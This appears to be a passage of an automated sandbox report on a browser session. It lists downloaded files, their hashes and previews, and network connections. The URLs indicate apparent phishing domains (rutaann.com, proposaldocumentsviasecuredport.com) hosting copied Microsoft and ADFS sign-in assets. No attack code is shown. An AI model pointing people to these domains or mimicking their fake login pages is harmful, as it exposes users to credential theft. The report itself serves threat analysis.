                                                        Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):3.990210155325004
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):315
                                                        Entropy (8bit):5.0572271090563765
                                                        Encrypted:false
                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                        MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                        SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                        SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                        SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://proposaldocumentsviasecuredport.com/favicon.ico
                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):61
                                                        Entropy (8bit):3.990210155325004
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (46820)
                                                        Category:downloaded
                                                        Size (bytes):142588
                                                        Entropy (8bit):5.430217078389262
                                                        Encrypted:false
                                                        SSDEEP:1536:Py0DWHTpHgTPRUbx3XCg/MJA5NOii5WLeVdgWLDY2Js0VgtWyTJmxyAXP3onrGGF:qHlU1g/Mq5L9EveUynbBwsccVP
                                                        MD5:DD6E2BDC76569B2ADEB6ECB8A6665C74
                                                        SHA1:59A5450A3F2D11AA888A9072D1982B74928E1F71
                                                        SHA-256:A6ECA1E3F63DA6F3967BB232789E026C2D3B9CF88EB4B1E22513B6A05F39ABA4
                                                        SHA-512:62971A5BEB3707E160AB2397D75B67F4B11E2ADF3450844DC6B394C4A45F8EBA6A8B3B3AB15E83B2452013062FDC5D39A9EE36A918ABBD97AF492D9C4276B2CC
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rutaann.com/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js
                                                        Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (48122)
                                                        Category:downloaded
                                                        Size (bytes):48123
                                                        Entropy (8bit):5.342998089666478
                                                        Encrypted:false
                                                        SSDEEP:768:gCbPzVMta23aGa0rn5iWqS2kdX+iGwS3EjtCsCXY2KIEjkNY1LBep7iFFQ7XIrva:Ita2qGa0rn5Rq05GE2K9k7
                                                        MD5:EA38BDA3C117E2FE01BD862003357394
                                                        SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                        SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                        SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                        Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 20 x 7, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):4.068159130770307
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlbItell/xl/k4E08up:6v/lhPy617Tp
                                                        MD5:4A1414D0DF90FE97550D6010A77E0DF2
                                                        SHA1:271EC4E62926439EEB022071B230265530738912
                                                        SHA-256:2CEB9FEEF041C1499676B7C08C8E195E608065089716E79330ACC853B290346E
                                                        SHA-512:64FC7887A72BF7FD57B1809C4F0E0AE6A37780477958F857A0DCB512AEA7697221DEB863E406F8653E4B7A1253A9A8BFDFD96BB672169C89526E88B79210D9FE
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR................o....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 20 x 7, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):61
                                                        Entropy (8bit):4.068159130770307
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlbItell/xl/k4E08up:6v/lhPy617Tp
                                                        MD5:4A1414D0DF90FE97550D6010A77E0DF2
                                                        SHA1:271EC4E62926439EEB022071B230265530738912
                                                        SHA-256:2CEB9FEEF041C1499676B7C08C8E195E608065089716E79330ACC853B290346E
                                                        SHA-512:64FC7887A72BF7FD57B1809C4F0E0AE6A37780477958F857A0DCB512AEA7697221DEB863E406F8653E4B7A1253A9A8BFDFD96BB672169C89526E88B79210D9FE
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfd
                                                        Preview:.PNG........IHDR................o....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (8429), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):8429
                                                        Entropy (8bit):5.746393707913574
                                                        Encrypted:false
                                                        SSDEEP:192:bVAgNed0bEWxUwgwZv+qagLjoZg+C2Ps4Q8nqIJ8gbW+:R3Nho3IZmKkZPC2Ps6nlygbW+
                                                        MD5:30133524B19AD21B416C301E9AD81E84
                                                        SHA1:07A5F87D271ABCEEC51ACA6B5101A7B1FCB3577C
                                                        SHA-256:2E8E8F96E4B7AEFF8D0E1E2A1C738DACFBDA6A70F7FAFF0D6CE9EB66D180CF2E
                                                        SHA-512:126FB4C1A77837F00F1FF0B8B56C92C7217ECFA52E00A0D16A05A959DDE17417EBC2443CD7DB660F63C8B47D61B685C87A8FB1AC735F712D8774428394929DE9
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?
                                                        Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,l,s,v){W=b,function(c,e,V,f,g){for(V=b,f=c();!![];)try{if(g=-parseInt(V(350))/1+parseInt(V(298))/2+-parseInt(V(308))/3*(-parseInt(V(365))/4)+-parseInt(V(358))/5+-parseInt(V(390))/6*(parseInt(V(340))/7)+-parseInt(V(304))/8+-parseInt(V(384))/9*(-parseInt(V(301))/10),g===e)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,647932),h=this||self,i=h[W(369)],j=function(X,e,f,g){return X=W,e=String[X(359)],f={'h':function(E){return E==null?'':f.g(E,6,function(F,Y){return Y=b,Y(335)[Y(351)](F)})},'g':function(E,F,G,Z,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(Z=X,E==null)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[Z(377)];R+=1)if(S=E[Z(351)](R),Object[Z(315)][Z(306)][Z(331)](I,S)||(I[S]=M++,J[S]=!0),T=K+S,Object[Z(315)][Z(306)][Z(331)](I,T))K=T;else{if(Object[Z(315)][Z(306)][Z(331)](J,K)){if(256>K[Z(316)](0)){for(H=0;H<N;P<<=1,Q==F-1?(Q=0,O[Z(402)](G(P)),P=0):Q++,H++);for(U=K[Z(316)](0),H=0;8>H;P=U&1|P<<1,Q==F-1?(Q=0,O[Z(402)](G
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (523), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):31246
                                                        Entropy (8bit):4.957807532039527
                                                        Encrypted:false
                                                        SSDEEP:384:xctejXOmsnslOERMYu+WlB8skjhjobWwUfE:xc0Oj6weE
                                                        MD5:4E83011A56CDA084DDC2AE17863FB548
                                                        SHA1:BAF326A140F1B28F818A3C61BF2B405623F717C1
                                                        SHA-256:662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057E
                                                        SHA-512:76A8FC8915063B9CC306E1D30BF1130403AC17450061814F527773B3B802B5AC7E5F1EC525E713AE13DB741248E22C9FE73F46A54191CBF3C2C34A991703F88B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rutaann.com/adfs/portal/css/style.css?id=662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057E
                                                        Preview:.* {.. margin: 0px;.. padding: 0px;..}....html, body {.. height: 100%;.. width: 100%;.. background-color: #ffffff;.. color: #000000;.. font-weight: normal;.. font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";.. -ms-overflow-style: -ms-autohiding-scrollbar;..}....body {.. font-size: 0.9em;..}....#noScript {.. margin: 16px;.. color: Black;..}....:lang(en-GB) {.. quotes: '\2018' '\2019' '\201C' '\201D';..}....:lang(zh) {.. font-family: ....;..}....@-ms-viewport {.. width: device-width;..}....@-moz-viewport {
                                                        No static file info

                                                        Download Network PCAP: filteredfull

                                                        • Total Packets: 719
                                                        • 443 (HTTPS)
                                                        • 80 (HTTP)
                                                        • 53 (DNS)
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 25, 2025 21:29:10.772783041 CET4968180192.168.2.42.17.190.73
                                                        Mar 25, 2025 21:29:15.353504896 CET49671443192.168.2.4204.79.197.203
                                                        Mar 25, 2025 21:29:15.663395882 CET49671443192.168.2.4204.79.197.203
                                                        Mar 25, 2025 21:29:16.272792101 CET49671443192.168.2.4204.79.197.203
                                                        Mar 25, 2025 21:29:17.553999901 CET49671443192.168.2.4204.79.197.203
                                                        Mar 25, 2025 21:29:19.959367037 CET49671443192.168.2.4204.79.197.203
                                                        Mar 25, 2025 21:29:20.381278992 CET4968180192.168.2.42.17.190.73
                                                        Mar 25, 2025 21:29:22.534121037 CET49723443192.168.2.4142.250.80.100
                                                        Mar 25, 2025 21:29:22.534199953 CET44349723142.250.80.100192.168.2.4
                                                        Mar 25, 2025 21:29:22.534286022 CET49723443192.168.2.4142.250.80.100
                                                        Mar 25, 2025 21:29:22.534452915 CET49723443192.168.2.4142.250.80.100
                                                        Mar 25, 2025 21:29:22.534473896 CET44349723142.250.80.100192.168.2.4
                                                        Mar 25, 2025 21:29:22.749257088 CET44349723142.250.80.100192.168.2.4
                                                        Mar 25, 2025 21:29:22.749345064 CET49723443192.168.2.4142.250.80.100
                                                        Mar 25, 2025 21:29:22.750626087 CET49723443192.168.2.4142.250.80.100
                                                        Mar 25, 2025 21:29:22.750636101 CET44349723142.250.80.100192.168.2.4
                                                        Mar 25, 2025 21:29:22.751117945 CET44349723142.250.80.100192.168.2.4
                                                        Mar 25, 2025 21:29:22.804044962 CET49723443192.168.2.4142.250.80.100
                                                        Mar 25, 2025 21:29:23.396272898 CET49725443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.396317959 CET44349725104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.396430016 CET49725443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.396917105 CET49726443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.396956921 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.397067070 CET49726443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.397087097 CET49725443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.397099972 CET44349725104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.397279978 CET49726443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.397293091 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.614483118 CET44349725104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.614552975 CET49725443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.617108107 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.617187977 CET49726443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.620026112 CET49726443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.620039940 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.620470047 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.620755911 CET49726443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.621882915 CET49725443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:23.621903896 CET44349725104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.622265100 CET44349725104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.664283037 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:23.664625883 CET49725443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.089283943 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.089386940 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.089445114 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.089483976 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.089592934 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.089785099 CET49726443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.224742889 CET49728443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.224822998 CET4434972835.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.225138903 CET49728443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.225656033 CET49728443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.225692987 CET4434972835.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.289587975 CET49726443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.289633036 CET44349726104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.325798035 CET49725443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.333084106 CET49729443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.333138943 CET44349729104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.333260059 CET49729443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.333602905 CET49729443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.333621979 CET44349729104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.336404085 CET49678443192.168.2.420.189.173.27
                                                        Mar 25, 2025 21:29:24.368308067 CET44349725104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.423314095 CET4434972835.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.423408985 CET49728443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.424884081 CET49728443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.424909115 CET4434972835.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.425159931 CET4434972835.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.425544024 CET49728443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.468302011 CET4434972835.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.540026903 CET44349729104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.560280085 CET49729443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.560307980 CET44349729104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.560440063 CET49729443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.560446978 CET44349729104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.639913082 CET4434972835.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.640089989 CET4434972835.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.640172005 CET49728443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.640388012 CET49728443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.640429020 CET4434972835.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.641083956 CET49735443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.641138077 CET4434973535.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.641206026 CET49735443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.641427040 CET49735443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.641455889 CET4434973535.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.650125980 CET49678443192.168.2.420.189.173.27
                                                        Mar 25, 2025 21:29:24.760746002 CET44349725104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.760879993 CET44349725104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.761045933 CET49725443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.761862040 CET49725443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.761879921 CET44349725104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.769936085 CET49736443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.769968987 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.770915031 CET49736443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.770915031 CET49736443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.770946026 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.772751093 CET49671443192.168.2.4204.79.197.203
                                                        Mar 25, 2025 21:29:24.794364929 CET44349729104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.794517994 CET44349729104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.794608116 CET49729443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.795253038 CET49729443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.795265913 CET44349729104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.796864033 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.796897888 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.796992064 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.797210932 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.797224998 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.843080997 CET4434973535.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.843347073 CET49735443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.843372107 CET4434973535.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.843744993 CET49735443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:24.843750000 CET4434973535.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.988610983 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.989250898 CET49736443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.989279032 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:24.989367008 CET49736443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:24.989372015 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.017203093 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.017693996 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.017721891 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.017827034 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.017832041 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.064966917 CET4434973535.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:25.065274000 CET4434973535.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:25.065357924 CET49735443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:25.074004889 CET49735443192.168.2.435.190.80.1
                                                        Mar 25, 2025 21:29:25.074042082 CET4434973535.190.80.1192.168.2.4
                                                        Mar 25, 2025 21:29:25.261077881 CET49678443192.168.2.420.189.173.27
                                                        Mar 25, 2025 21:29:25.272145033 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.272525072 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.272650957 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.272676945 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.272685051 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.272697926 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.272748947 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.272799015 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.272840023 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.272861958 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.272977114 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.273140907 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.291214943 CET49737443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.291238070 CET44349737104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.418634892 CET49738443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.418678045 CET44349738104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.418807983 CET49738443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.419147015 CET49738443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.419157028 CET44349738104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.546309948 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.546358109 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.546452999 CET49736443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.546477079 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.546492100 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.546565056 CET49736443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.547523022 CET49736443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.547537088 CET44349736104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.631743908 CET44349738104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.632487059 CET49738443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.632508993 CET44349738104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.771168947 CET49738443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.771182060 CET44349738104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.771426916 CET49738443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.771445036 CET44349738104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.771486998 CET49738443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.771490097 CET44349738104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.771522999 CET49738443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.771527052 CET44349738104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.796355009 CET49740443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.796395063 CET44349740104.21.92.117192.168.2.4
                                                        Mar 25, 2025 21:29:25.796493053 CET49740443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.796602011 CET49740443192.168.2.4104.21.92.117
                                                        Mar 25, 2025 21:29:25.796610117 CET44349740104.21.92.117192.168.2.4
